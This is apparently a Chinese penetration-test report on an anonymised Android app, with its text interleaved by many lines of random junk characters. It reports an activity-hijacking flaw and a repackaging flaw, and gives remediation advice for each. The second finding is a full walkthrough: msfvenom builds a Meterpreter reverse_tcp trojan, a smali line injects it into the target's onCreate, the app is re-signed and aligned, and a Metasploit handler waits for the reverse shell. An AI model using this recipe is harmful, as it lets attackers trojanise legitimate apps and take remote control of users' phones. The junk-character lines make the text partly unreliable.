3 c+ x$ @! l0 _0 C0 H
% G. d" l" `/ p% [% Y
2 R$ d: N+ A+ T! J7 H ( b3 Y4 I9 a( F+ G) X
( b3 L$ C6 N8 Q0 e 表1-2 测试结果
' o! H& u6 g' F2 O6 ]# G! S
4 `9 d( G4 N1 V! ] D- Z, [' ~+ B 3 j) j: u" q l) e9 k- \
8 j G' {! X( u' L( M. [
9 X7 g/ \6 S" N8 u4 S3 k
/ Z" ^. s5 i* N6 ~% c" x
; h8 a) b) S5 ^+ W: I6 _+ Q1 M% l9 y3 I
* L2 j a n9 p. C1 C
+ l. i) D/ U8 O" _
R7 O l" s! U6 a" u y) }. I! C
1 J) x7 a; \+ O- H
2 检测结果
/ `: k' Y/ `$ v# a/ ~; ^& V% z8 S5 E4 x
0 R! Y3 ]3 \) w6 d3 Z
W4 n( |/ I6 N0 a- e8 p. _, U
! Z8 c; Z$ ?( f# v; F+ x+ l
/ V1 T9 ?! @5 Y1 A' p9 \+ n 2.1 某某某
5 j8 B7 V6 h/ S: {: b3 G- P `* G2 ?
7 k. a( X2 K. W ?$ M7 k
2 p+ r a& d8 z; A; z$ N* @" s% j D
+ c! `( }5 n0 d+ v! p4 T
5 l" R- b/ ?3 I, ~! S) f+ d3 n 2.1.1检测目标 8 o' Q8 g9 \ f
9 A2 Z' q- Z: [ ?/ z# D! v' Q5 V ( a9 i' ?' {" J' C+ e* k% R) o
( E P6 f8 { m) B6 r- a5 a
( n& o' O6 o) A) p: a8 a
! z& [) k) j: `% p, E' I+ T# Z
目标地址: 某某某某某某APP
/ a* G' [; {0 a E, D* r( R% G; ?! ]" Y
5 K) I0 x$ h& `0 z- `6 g- j0 j
' z7 L8 }0 \# Z" r
, z8 l! ]5 W" R5 M. G* s) N+ Y1 t
2 [* o. K, W% S9 B# J3 `4 M8 R 2.1.2检测结果 * w L1 @! O, |/ Q
0 N: L& p; g# Z: b
6 _% J- p! r( E7 z* \7 n
1 ]( B* }$ q0 H7 M6 H
, Q" F3 q6 c; ]6 r% R, D
, p1 u# }- E1 h; g: m' B5 H
2.1.2.1
1 F+ b" W* z m; v! s! E- x9 Y) \0 K% V$ o" c2 o( [& ^' c
. Y9 J4 n& [# u Z8 a$ L% z
, v+ z& K: l& u4 f( [" i& k3 t
9 F5 c- B+ K2 O& N7 {( T6 Q: d
3 |, U# C S: O6 ^: D8 [2 X' p
漏洞链接地址:某某某某某某APP
0 ^/ l# p% r! [# }: h: l: p: S$ N0 J6 y
3 ^/ D7 u$ D4 W) K0 M# ^. x- V* f/ M* K7 t- o
. e2 v, P7 y7 D$ e E
' [: F8 l4 ?; i. D
6 t, s! v6 L9 W7 C5 _9 J/ m% Q0 G/ w5 `% ~
0 U! o' o8 r* ]! J: F: i/ N
8 V8 G1 j9 N/ a; S2 u9 ?+ |9 x# e % E3 w2 g% {; c/ c, Z
# W; \* J% G- I7 U" C" G# ] 漏洞分析及取证:
" q8 j% k5 m4 }" J6 J' f) t: ?$ ~' V3 c5 J9 F" ]9 u' V) _. z
! G" n' W* N2 ~$ x8 S; b$ X3 x
) `0 x; }+ ] |" b3 k
5 V( m: p. L; k& B7 K" L! R+ p' X! P( w! U( S
通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图:
9 ]5 @: D% E" d; ^; w {; w+ Y- T' O# t9 n0 r8 I" {4 [9 k$ a
6 ~+ l( d! C7 |, J( B
]$ D& M; O6 [/ ^" S; |
: i- e! u( V# v8 L$ U. N3 t$ m, ~5 q
8 F2 a3 F- c. F Q" {/ B
( ^9 a ?3 C7 C: j& D) ~6 q ) B. Y! h& C7 C( _0 ~& \1 m7 R
. C) i7 z: Q5 Q, f! z. i
5 G. w7 Q& P5 f6 e3 A4 ?* ?9 C4 p( {, j$ A
( Y+ l; Y+ }3 T8 X& i2 r
& e0 F4 |- k# r2 h- F 5 y% q8 r! m q8 x5 S
: [; L6 O% e2 W A- c
+ `. O( w! A% e
0 `3 y- p: R7 H+ o5 U
5 a' s: ~* x% o8 P0 C. w( y8 c* `
+ q' \4 S9 [7 b- T
' w9 x" ^7 m' m
( h2 R6 K; t- ]3 `5 R$ |% p3 u9 w+ b( }( L) o% Q! c" x% z- h3 ]
* z( {+ L: M$ y6 E V$ [% e
. w8 ~7 C q; X( X9 r " H' J' `6 O0 Q! d9 ]
: L! J* k* M. F. K9 Y3 F6 h
' m/ M: b$ [1 C: |- C
' `1 F' y! x8 P6 w. ~' ~7 L: p2 C) v' I
$ I5 z. g3 n( a2 @4 u z% I+ M$ }8 L$ q4 g a5 x2 `
4 c& b$ ^% t( t( ?
# I" v; {/ Y* o: P( K5 C + t1 G* o: w% _" e& \/ _
7 C+ m ]( O/ H g( K 漏洞危害:高 5 N; B' D) w/ [6 A* L3 g( t
. n9 N. q% ?8 j9 s- ~3 b6 ~0 i/ ~
( R$ [! W8 I" s- C( n3 z" P- ?& C @ y+ f9 S) ^0 {! ]7 K# ^
7 ]6 Q3 R: z: F" C+ S: J/ l5 c
$ f, v j3 {8 b2 e1 [
; G, f* ]9 P. @6 o, J; _* Z5 q7 B
' ?% m, g: T; u 0 Y) ^6 s% \, K
3 x( p3 `# [/ k& t
* w% t, b( ~+ o7 T P: d z/ J
L y7 J4 [# b# u/ L& n
( K; P0 `5 ]! d
& X7 V h9 D6 K
, w" }1 P$ V, B8 f7 M8 p+ j4 n& D, O+ o0 {. b. i) D* X* j
严重程度 * p; z3 l- g8 B; {
* h d( X5 i5 r8 _3 o 7 c- h4 w) P! p- v' }
0 c1 X+ s% _' A |
# Y$ p. p* z7 S' V. q! ]1 |" M, o8 a. c7 m( O# S$ e
# `; ?( L5 d0 J0 x6 N" K# m
! s1 w& q6 f2 ]1 @0 P% \8 N. G5 x+ j ( |5 O8 b) X: H! y. c1 p0 a" f3 C
- Q) o2 D5 M3 O4 Z( q. d# G% A 高 4 o9 _# t, H) l/ D! s( u7 h
( G P; g- ^- K* [ T
5 G( L# D8 l: e; a; P" h
$ z% f# A2 K8 y- i8 s |
9 a( a7 F+ X+ x/ ^4 m, {$ E+ z( Q2 G
6 J7 ?, T3 D( a% C' X% f
; n* c4 A0 h$ N0 R8 _+ B7 X6 I6 V& t
5 L# l! P% u* ~9 Y7 i
, z/ K# T! e9 R9 K5 V ■
7 T( j; h' d8 G0 ?) U! Q7 O9 R7 O' N' P7 o/ |( B
8 F2 Q L- S, i% Z& T' [8 U5 x
+ @3 v, I9 D1 o' l1 J5 o" P" t, f |
/ c& G+ U8 `* W9 z
, M6 m z5 d% Q" Y
2 M, T2 y9 i3 P4 Q3 D- b5 H# b. y8 @ O# R7 @& H5 E' j
' R5 k8 X6 x" {7 L
! X ?7 r: k, b8 O+ w; \ 中 9 f& x% t# ?5 }: N% N: v ]
3 A) f! W5 E2 `) L% X9 W# r
: B9 j( W3 u! K( |
! E! T+ y. d0 E @* B | 4 E, b G" z( \: b& n! _) f9 d4 y
& s o* |- T s/ X . c* R( u; {% Y$ P; f, l
9 Q) b% J) i6 {. Q5 y
& x! J& P7 }6 A8 q$ P! ]4 L- j; W
9 n: v# k8 ], r
) B' ^) |: N3 N. \" ?6 ^; r0 X I) [5 X3 s' y
$ D7 T# ]( v3 b. M5 {5 \/ y+ O: a
, m5 y( a5 L6 v' O2 N
| 3 t: ]+ P: e) m; v& t
2 Y3 M! y# `! D* I% D , O( `! |. N5 I3 C& ?1 a [$ {! Q- {6 I
# {; U- D) k' B. S: G4 o. l7 E% }
' Q7 f) u# I$ ^# E
0 T, ?7 v. H" s4 D$ k2 q 低 7 @9 R, Z: ?& o" e3 L0 R: b
6 C* Z/ V, e d! F % {/ `1 G* S& G, `! ~' \7 k! C
; a5 d1 L1 e% Z/ X# U$ ?1 y5 |
| G8 T: Q+ J: |3 b: H
' ~3 L! L- ?. J' i& N" B : y0 k# h6 \" u9 l. u" u) d% ]6 f
, D( G; B( a6 ]
( H7 B7 |. Z5 R* [
4 ^" y' J5 S x8 w+ `2 {
" j4 p6 b% A; g+ K5 c# j. q$ T: B( l# c
7 c. y3 G, t$ @3 k8 u8 z6 j, Y6 [) T5 i3 I0 A5 D
|
$ _- ^ n0 S5 R1 S v L4 A
7 j( I4 ?) v0 O3 q( v
9 k) _8 l' F" [, Q$ N1 z9 g, w" Y6 _/ }# ?& B* X* H$ |: k! o
. p4 M& b1 y5 M" s" v: M' C
3 z5 Z, R* r+ b1 q0 d7 j. ~
! M' C4 o. q5 g# }5 D0 H
9 D3 N5 `9 O' j
4 D8 e" ~3 n" G& `
) m! a0 y6 `; r, M6 L ; H+ k6 W1 r! Y: y
, `5 F$ T- X, F$ ^
& v/ c8 C% Q: t& O
/ o0 d) |- j% o, `" Y3 }
+ S0 {* o: ^* l* `0 v* f8 K: s8 m
! }7 z( m. l! q: X( @ {
6 | [1 F+ @$ n 修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。
, [) B9 t* e0 Z4 F( Z+ X3 Y& F: H& U: {7 c+ o( X9 }
$ p+ p3 C7 K3 Z+ T8 b. S& r( O1 X( T( r H; O0 `# q
( \4 B6 f, D. V' q7 h
/ A. Z9 P+ ?$ B
# R( L, a# y3 h; V; x5 {4 o- H% Y2 c6 m6 P0 R4 b
7 E% \9 L+ w6 w. f% P- W7 K
& w) f$ N/ F2 o3 d
6 ?+ \* g! X: I m/ k Z; z* j/ U3 Q' l5 H6 W
3 f' E$ ?+ V; k
9 a% D j5 {% R4 @
( s. z( g+ q5 u: ] H
; k: Y5 r, g4 `
+ N7 `' @3 [3 a
% r$ c, S8 N; n. c, N, n; q/ L! _ 2.1.2.2
4 Z3 E: f* R# M9 ]& A8 c6 t
% u e& C* B9 v2 I) w% p$ W. v + Y7 n& [- V8 a* p
/ B7 }& y1 E' }- b
# Y/ q. J1 H: U/ G& s
% T" Y9 h: }8 X( U. p) g
漏洞链接地址:某某某某某某APP 2 }$ ?4 ]" \6 _1 y9 X
$ n5 h9 B$ \7 w) i# H
7 R I" o6 v' J0 x( F
6 A& F( a+ B$ r, s' i
7 \. j4 x6 u$ s$ N. ^9 w4 G3 S2 J$ c6 p
漏洞分析及取证:
+ @2 L2 G" V6 f* m, w0 d) x0 ^8 T% z4 Z' w
! R% j$ c& H$ U; }" `, K
, E* M! g3 i/ V9 \3 `
" v7 T8 f1 I5 z6 y# ^
; V" e8 D, n+ O( W 通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下:
/ B0 c& Y% h" c3 e
6 h+ g6 [ @( b; G; C, L 2 @. m+ ~4 D% W9 V
( X# _- b* N( w" Y$ i5 ~' Q
/ y! ?* F4 i; a* D/ \. I
4 a$ f+ A4 ?) p" G( f: ? 用Metasploit 生成木马 apk : n7 [$ b( W. ^0 F& W( L: H
0 J6 X# L( z. z4 @- ?( k+ ^1 Y
/ l4 v0 B& D4 W% |* Q# K, y& a0 O" l" t' m" O! z% C
( h: O" D. }: Z" W
2 H& \# p) E: O5 F, X9 P msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk
4 K# ^% n; b% q* I5 u) S7 O T/ J }" s% ^
$ I4 {" a' J7 R; Y, D' _3 l. h; @3 \7 W9 _! x
0 s+ A" H6 S1 X m: E
6 ~9 _! d" v4 u+ U 反编译目标apk和木马apk + t2 r7 \. v8 y9 J; a! ?8 r
6 v/ Z+ r. z, o% _% T Q/ b
% v0 Z. ^3 A) P1 c& s
$ c# P8 m' {* X4 }9 T! g
) n9 n+ D# \# w3 a
! z: a1 I5 A% e# I! v; h) z% `8 Y7 v apktool d target.apk 1 o0 k. Z4 x5 j$ l. n u
3 x( R4 y$ }+ ]. _/ x apktool d cockhorse.apk ' `, U% b; s% z
- s; s9 o& ` Q' e* Q1 x& G : O, x% N( z- i4 b8 s. {# t3 ^0 a
) D% w8 r& h) Z; v- c# k
2 ]- ~! N s/ C4 ]
1 U( E6 g$ a8 H) [
木马 apk 注入目标 apk
& ?# j o/ C" o4 a6 C; w4 U; u7 m% F6 N
4 Q$ Y1 K* D7 i* f
( Q5 e# O9 R9 f x- T
`9 Y+ q8 B1 l: p9 ~9 @
8 ?3 B, e" l: v' b2 D; O, g _6 C 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码: , R: c) g, G+ J
- s( w" t, d0 t invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
: q! ?$ _* ~$ f3 ^9 p3 m, i) ~* ?7 u* p+ P, Y) p& _5 J+ I
2 n/ P* w c( i8 U$ E. g
4 W9 G0 z+ d8 E6 y
1 [8 B7 e' y6 g" y
: E7 ]7 i/ E$ Q7 f4 R, K* } `8 A 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 6 g/ v: q5 D" K E
% C, W- O0 H0 ]( h
# o$ D6 G6 h+ D$ C+ p t8 y3 k. s7 Y, \. `$ _+ v6 ^. E
- E% E8 b# v" y( J& ]# I
+ i+ e2 r1 J/ f% w: r, u! S5 f 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下
3 Q) K P8 @. N
1 _9 M7 V5 q% H/ Q. F- k& a/ @ $ t9 N! Q# R+ F3 a7 r8 ^
' a, q! u2 Q2 @! B2 E ' ~/ x$ I: I, [
% N2 g$ I- G* \- x& e; A& q% ]6 U# y
回编译生成最终 apk 1 v6 n& _9 |1 F
7 G' ]$ [7 F& f
! K* A( }& ?- D
$ a/ R: h6 U" s9 ]9 }
1 C X$ v$ i, a7 K! J' p
0 f6 L; u2 u k2 U( U& ^
重新打包 # I# V. K; t. a- s/ a8 y, ^
! x0 P5 h6 u, F% `. Y
6 ~( i" U: O+ C& t; d( `! I
. Z, o6 K) Q2 G1 U$ D* }: P+ \
& x, ~# _8 U" A7 \1 O5 e1 S$ |+ B( X4 g
" }) r& s$ D& Z8 E# a8 R+ U* t apktool b -o repackage.apk target_app_floder : a$ p+ ~8 P) w( g( W
; H+ \ @$ n2 I- I: X1 J4 `( J: i0 t1 t
" c' Y8 B. } ^, |! j3 j2 z# a
X' X' g0 A7 D8 C
1 ?- r6 c& q5 j
& U5 I: `0 W5 s& v5 l- D
创建签名文件,有的话可忽略此步骤 / y) ?7 b2 A7 ] h5 ?( F7 e
; F0 K3 z% o; R6 R; ]2 n
_, U& t6 g# w" |9 Q( g2 V1 B, w6 s; a5 E' X- e5 ^
" [: Y+ g @5 w6 P9 L
) j7 \7 o6 m0 E; w N8 H keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 . r, y1 ~# [6 X, E X) _
2 Z1 d6 q* p9 z, t% f0 H+ _* s
& t, z. n/ ]. I8 e3 @0 O( n! W1 ^ l% K P2 P
" Q$ g' q3 L; }/ @& `- r2 [
' l, p7 r7 E x7 y 签名,以下任选其一 & i% N3 G; h" h$ Z7 M8 Y
6 L4 r/ w/ o4 s: f% N
6 R) s0 ]3 V0 p
A$ m" m4 m$ M3 F0 K! L: W; ]
) W D3 h4 I9 U2 {5 c _- Y, B0 Z7 L& E
jarsigner 方式 : s8 n; N, i+ h* e# d# V/ Y9 O
: A. D' N0 O" l2 W7 w
. \( V, w6 o/ R2 g, n) n) J6 Z# K" Y; I! ^
, i( P. Z# J, z
( A6 ]9 U! i9 f& g( Y+ a. g& g jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname
5 I2 A9 n3 n! K% R4 b/ H3 {, S" n' K, A; [& i+ ^7 _, h6 O
9 l3 N& W2 u% a" K, B* N
+ J4 U8 `4 J( W2 s5 R
+ N( k; y ?8 H. H* i; q; K1 e- [8 `1 Z. [
apksigner 方式
/ Q1 x$ V, `3 c- F7 L M- `
2 D o# g6 Z i1 k - L: h% m! A( g7 _. f3 d% ^
) b% c0 `; r: }" a3 | . s: r# g( u/ v* X7 n2 B9 `" A
, v0 k% \0 b: d+ E% e" M: Y apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 6 {& R! J4 w! @$ m& o
9 ?5 |- a) ]4 Q6 c. j% d
+ f7 D8 `: F" Y. w) D
+ _" L: G3 Z" O6 S7 H* t 7 l4 m) \2 @. K& y. [" R8 U
3 L5 p& @% d& n# O: B8 q 如需要禁用 v2签名 添加选项--v2-signing-enabled false - [: T0 s: w8 D' K0 W( j
s, \! L1 ~8 ~4 \5 _2 v1 N! f + G {8 P& w9 D- H6 ]+ y1 q: Y
7 @ T) H1 A0 E2 o) b9 { m
, `8 z l8 K5 }5 h9 [; H& t" _* S+ d
验证,以下任选其一
! y4 V2 q, v( T. E( V8 H |" ^1 `! K; D! b# e6 R2 x
D0 J$ l: y& S' m" E& B4 [, d" x
$ d6 w2 w) f5 E0 s: G3 A) T) [ 3 S& t# T$ W9 r
$ v0 s3 T1 ?( } Q4 @* e. }. b9 M jarsigner方式 3 E; A$ U. q2 f, _$ f
* N0 X, {, ?) _# L# `! d . T7 `. q: C' R: {) B! D
% ]0 v' J5 a& c3 Z: T4 {
6 l% y2 A; p2 B6 Z; `8 V. U2 \+ C3 M. q9 U
jarsigner -verify repackaged.apk
# i, b) k$ c2 K- |/ E, Z \
2 {) ?! }( a' f" J, V/ b + Q6 o4 E5 u1 ?2 g
3 P0 C2 Z0 ~2 S1 p0 u* x
5 l( D+ N8 p& r8 |7 U! T3 i- y, g
; ]( e* G/ C/ H
apksigner 方式
# v% {' r7 e$ R+ S. D5 a* N2 |2 P$ Z2 |* Z6 h
D2 \/ W; `8 ?; h; b; K+ H( |
) o7 q' ?0 C. k9 v% x, Z6 N* V& g , n2 U! ^/ f; a- Z
) \4 b) D9 G$ [- c+ l, j% q9 F
apksigner verify -v --print-certs repackaged.apk ) c& m& S' u8 j; g7 H$ j
8 Q U) a; l7 R/ J
% f+ e/ `- W$ f! t, F0 [! o
+ f; w& w4 T% l Y
# {' i( n; c% x0 P/ Q* ~, ?* ]& V3 K2 B4 K! l7 g0 e9 X
keytool方式
: _# Y) }+ B# e
0 ]% v) I2 w6 |" k1 Z
G& v+ U# y7 O$ l2 C2 q$ i
5 B0 U/ S- Z0 A% I, S% d / a- i. k, `9 `4 o$ h! v3 j; G
6 n0 R! |; E& b) Y keytool -printcert -jarfile repackaged.apk
% G5 P( p3 Z1 s! Y3 l
8 {" k q: u+ k6 F # b9 i! }& t2 d4 Y2 d( M( o2 w
8 a5 w" ^- y; g
: u) V2 w% N0 i) `4 k- }3 n. O" ?& G
: v' D: \# U7 M2 |0 K+ U 对齐 5 h5 t/ K1 m6 j+ o2 W' p+ E
7 i" V5 I. H9 M, D- @
. d0 n& t J$ C( {/ O2 u9 s
, |$ O1 C; H9 B- D+ Q 2 c4 {# u5 y& H1 C* w. ]
. G2 a- x' |3 a3 U0 A0 A! x
字节对齐优化 {- I {3 T9 Z G8 p
# T1 _& N2 o1 S
) E4 r& w. x! t. E8 k1 _
3 b1 b' g& g5 j $ C. M4 x* z1 h) O3 I- V( e0 H
9 l9 T, W! Y3 O8 n
zipalign -v 4 repackaged.apk final.apk
* m* I; w8 ^: j: N4 m: A' g9 ^
$ ]1 z+ D( ~* h* i; h X, d / k6 a8 R$ T! X4 w2 U! P, j
9 a8 [9 |. F; R4 H) ?
, }& A3 s4 L* B; X
3 T; J+ K, |- J# q2 p( j. L 检查是否对齐
3 M% G8 b; K: X" B% v$ Z6 m
+ N, M" ~0 E6 c3 I% R& k
( B' r& b, g; {7 q |# P; s [) p9 R
4 G& I( p' ~8 b5 }3 c( ]/ B3 g
& r3 [; R ?4 C! s
& n5 B( `5 l: k" G) h( t zipalign -c -v 4 final.apk
. J: [0 \; g. n J
5 G; x+ e: }; K \5 `$ Z " ]: e8 P- K1 ]3 ?; u
% _. ~4 `& V& h. W/ h: l. w/ k
4 E* G( d8 E/ X
9 I/ n b7 A% p" \4 V* O
注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 . _$ K; ^' \2 n" Q9 A: v: R
1 D- N! E1 H' W1 k6 P4 r% r9 k; k
8 ?- j$ T2 s+ W# Y& f! a2 N: }. s8 v& r; i( H! g2 x0 ~
- @: _" M$ p9 p/ O8 x
( A. q8 N- b" g$ K# [* `; Y; k 启动Metasploit控制台,配置参数等待上线 0 H0 y* }2 H8 M% I$ a2 {
7 ]# v$ ~/ V1 {9 W; u( E; b/ \. B u ( s# {8 e( w; l9 b8 }$ ~( G. P
. J! s7 ^. N! B: q7 H 6 `; I5 M ~" q: q- M; Q) W
' k- M2 `9 [9 m6 B
在终端依次输入如下命令 , i; r% u9 b. g
& L! ^- b/ `; V
- O m# |0 m$ v1 x* q' l
9 Y& U& _" \2 I; _ - d; ~* i# _1 n5 E ]
* F8 Q% O# Y. b msfconsole 8 x6 @" k* E# m7 j# Z. q6 [. Y3 i0 X
3 I3 p/ }: U; U- ? ; b9 f. _: j8 O0 t t& ?
$ u# v R% u" Q2 F- ^$ x& Z
+ ?4 d; j, A& \, q* z4 `7 ]% `% M0 q9 L
use exploit/multi/handler 6 v* N+ M. C/ }1 _* R- O6 s* o
/ y( }+ U0 E+ G# Y
* x! ^3 u3 {/ C% E' T5 u6 n
4 x9 ?& M9 p# U p* u& h
. Y1 d M. X( C5 `. X: P) U, M% _4 ?5 G7 x
set PAYLOAD android/meterpreter/reverse_tcp
" G. X- Y) J( |7 }& d
: M. |0 W) J3 j- R4 X9 p- ^/ ^ ' m V' u) o4 J- s7 @+ `' L
$ i0 V, R4 Y+ W ; D. p0 ~; q3 F* h1 ?$ d
N6 E8 ^0 E2 p# T! d
set LHOST 192.xxx.xx.xx ; f5 `( i3 m ~, Y6 z2 h0 T" c2 Q
, }1 l2 P; X: {
! H: U! ~+ T# v# C
) M2 X C& v+ c5 E) W: S+ q 7 Z) ~) |1 R3 N- u
4 X- z& Q" }: {1 | set LPORT 4444 5 p5 ^# e$ o/ [ P3 S: t! ?: d
( v. T: t( Q& M9 ~; u) V% y
8 j( | l* }% \4 ?* n% M! Q/ A1 @- ^+ v! _5 R* V& d3 j$ Y
$ o2 S% q7 _ R5 B
3 T2 O% O7 T( \; G5 p$ i exploit 1 }' m( D4 y, B' E
! f. g( d2 E* X
6 o% i, A- S4 i1 f4 Z3 H5 o B7 S7 D& ^0 i% W. H. X! N8 j; c
1 ]( e1 H. @+ ?2 g% a( S( }/ p, A; N3 r
之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图: , u, N7 H) K$ {4 o; a7 |2 Q
- k5 V, y- Z3 [
2 V: Z$ v, k Y. W2 I, k# s$ P) q
& h" X. e9 U: _2 v
& a B6 E+ H7 D0 Y6 _6 J; V+ r 漏洞危害:中 # R; q9 {& J: W, Z/ H* k$ N
) T4 H6 |7 I0 w/ p/ j
4 p, P$ ?4 D% g$ S
r% S7 t9 h! z V b+ J0 y. l: T$ f: J1 X3 J; t. j
4 Q& O9 Y+ A' _, {# F% N0 k
& [; k6 e( ^9 M; J
" r A( w- G& x: A% d, E 4 i) b; k. o p4 c' ]
- k- @/ a$ }& ?7 {- f / R0 T: x, r0 W! b
7 N% E0 N% K9 ^$ d
U/ H+ l9 o4 `' Q" t& R9 v8 m- r6 O1 ~) |# B
& N! ?, r x# k5 t. c! u' i
6 w- n" L8 N# J
$ z4 m" A# B) {# U" m
+ C$ c2 P2 i5 e) Q+ A2 D 严重程度 0 q) ^" R) u) b7 {2 p% v# C: D
0 x/ ?0 z9 N5 E0 P# p* { [
1 k, Y1 L8 V- }0 b6 b0 _$ i n8 R. k" P2 U
|
% l" C8 ~4 C! C' t' ]) \, ?7 J. E1 i3 L X
, [% D0 ]& j, q6 q- M& K# L
( ?2 R) Q. H1 w x5 u8 L$ h7 g# y
; L/ G) ]% u/ h- r! J
; |! G* a3 l3 ~+ I% A 高
7 Y7 q5 j: } i+ O7 Y4 }
! l8 [& q. a1 Z- }, N* ]6 a1 ? 7 |8 Q7 ~* _7 ~
+ C3 d( P8 t: I1 T' H$ n+ C" E | ; _2 n1 D* ]9 [0 @6 v: N4 R
Y" }5 u0 B1 j% Z4 g# d
6 I6 Z: Q5 X+ w' U3 N# @
$ E3 u0 w5 V) w5 z2 m
1 R$ g- P# \$ z/ U+ P0 G' ]1 K! C0 K% u2 _- A2 p5 h: o4 X
■ 9 @ O. F# X8 n& L' S; B* F7 e
7 r% C+ R! H. S7 }
- d( W! V4 { F! u0 \' v0 j* |
. v: M: W! m8 P/ H3 | | + j6 P! v" O& ^
% M0 X8 h2 h6 c
; p0 p8 `! ]" I0 M2 R' M0 u' o, A6 j$ B9 H
8 l7 `' P- ~+ G( A# m* |4 S& G. r6 m+ C" ?- p
中 . G2 t0 w" Y8 @; i, m: ^) m
7 g9 J1 k% K1 c
3 f$ [+ l8 z, }( S) j' N# c a) j
" m/ [( G7 a0 U) M |
2 P8 B" a) ~8 v+ \ `( e0 m' Q9 q, j( z q* I% L
' _/ Z4 q+ E, ~! v. n+ F
, s J& e7 B4 Z
; Q2 f0 X2 C# A8 {* s- q
) g! X' j9 p% V$ w8 j
; j8 G0 u }9 t6 Q. F1 h: n
3 R* t$ H' D+ r- ]0 K, B7 r( ^ 0 a7 h8 @3 S2 X7 }4 W
! s$ a# H- L- [/ V9 \ % V S. x7 e( j
/ ?( C! u. J3 O/ W$ a% S |
0 E1 ~2 R8 j1 o, G, K6 s! A+ `7 v6 F' {- l$ d8 D! z7 N
- a! i9 h6 M3 G" F- l3 ?& [& s
+ j2 P- A! \9 E
9 B1 n" y5 I4 A+ W. ^
6 {) }9 l/ o% ?6 n# I5 I 低 % `, k5 c6 e3 F1 G
+ N' { G+ P; e- [9 J; w
- Q1 m$ o2 h2 `; w+ J- \( t9 O0 `( v, U. G, _0 v0 J' C7 ~5 W. G, l+ T4 B
| " t( k0 \3 n2 n& x# ?' O
# a- s; n7 F! q! a$ J
I0 ]; s, N+ [, f" q7 l' q7 s( M3 c" P% }
4 {* @! l# [* ~6 s5 d N
% {9 W6 r# [0 l' Y9 @$ g2 q6 V/ A' U 2 l4 e$ X3 z4 Z7 @
. p% r5 ]# B. s1 C; Z
! h: _( F( V4 k' E7 d" E: p- C7 F f3 Q& i
" a) ~) N# m6 j4 e* ~, f' ?
) p7 a, D: [0 A. ?- A |
; e+ J3 j$ B) N. K2 O2 B
. P% \! i _3 `0 l- A # [+ Z8 f" d4 | N0 _: v
0 s1 S R; M( c; x8 ?' {5 w! H8 m 0 x2 L# P. A+ Z, r: p8 n! C6 ~
5 {; E$ _+ R6 s3 Y8 _
% ~- x% H# y% e
% {$ n% C2 V+ I) C2 T- |$ i
+ S- S& A, X/ I9 G' B8 x$ W' m: I/ o+ Z" ?
6 e& I- \4 r, G4 d# M- Z; k' Z! P2 b" E3 a, w' d
6 p0 h3 ?( C& E0 {" S, }2 q3 L2 F$ d% _5 l5 H4 S3 y- J) u
5 q, |, b( S; D
# |0 R; l |: u" p, I3 }7 L
6 g% A1 _/ Y% N+ l5 Y
+ ? ?" [, D! B8 Z4 p
修复方法:
0 p3 `7 x. [5 W
% L$ E- U1 Z: f. W3 p/ ~7 g
% i! u) m5 m; S0 L5 @) Z; z' @' m% W2 X1 }
$ b0 _% W1 l6 L2 U5 V( m0 E0 A9 @- ^
0 o, c+ S8 I5 A0 @. z5 v9 G 1.在 APP 启动时应做签名校验防止二次打包。 & k1 w3 i) ?4 }+ M+ _ }
9 L4 _+ f/ o2 e 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 ! F) K* r# H9 V+ j( h# v* U
0 Y5 q$ U, B, j$ }. L7 v
0 C1 b& V2 ]" \; q/ S3 n+ _4 Z$ b# Q7 f& Q( U, X1 A b
$ G7 Z, E! P: M# b
9 {5 W" C# Y3 g. M! V8 p8 t
& W# ^/ H- L* A+ H8 ^
0 A; z- V0 G% y+ R
7 R" a; |8 @) Q+ _/ }3 Q& I: D# g4 K7 X% z. |
$ q* S0 c" m% C- `0 u+ w; L# j4 T S
7 a8 z+ n9 c+ b: j- f3 m
; F4 w2 r Y0 ~2 d
9 r' f; a* V+ ^3 \- V) N% z
0 \* e S6 V% F, g& ^' }1 p. B0 \4 y7 A: ]' U8 h% K- {
, m/ P1 k* ~4 G
1 X( F3 d& B/ q; M5 @1 X \. Z1 \& d3 P3 E5 k
0 g- |2 j- \8 M& P) h# a |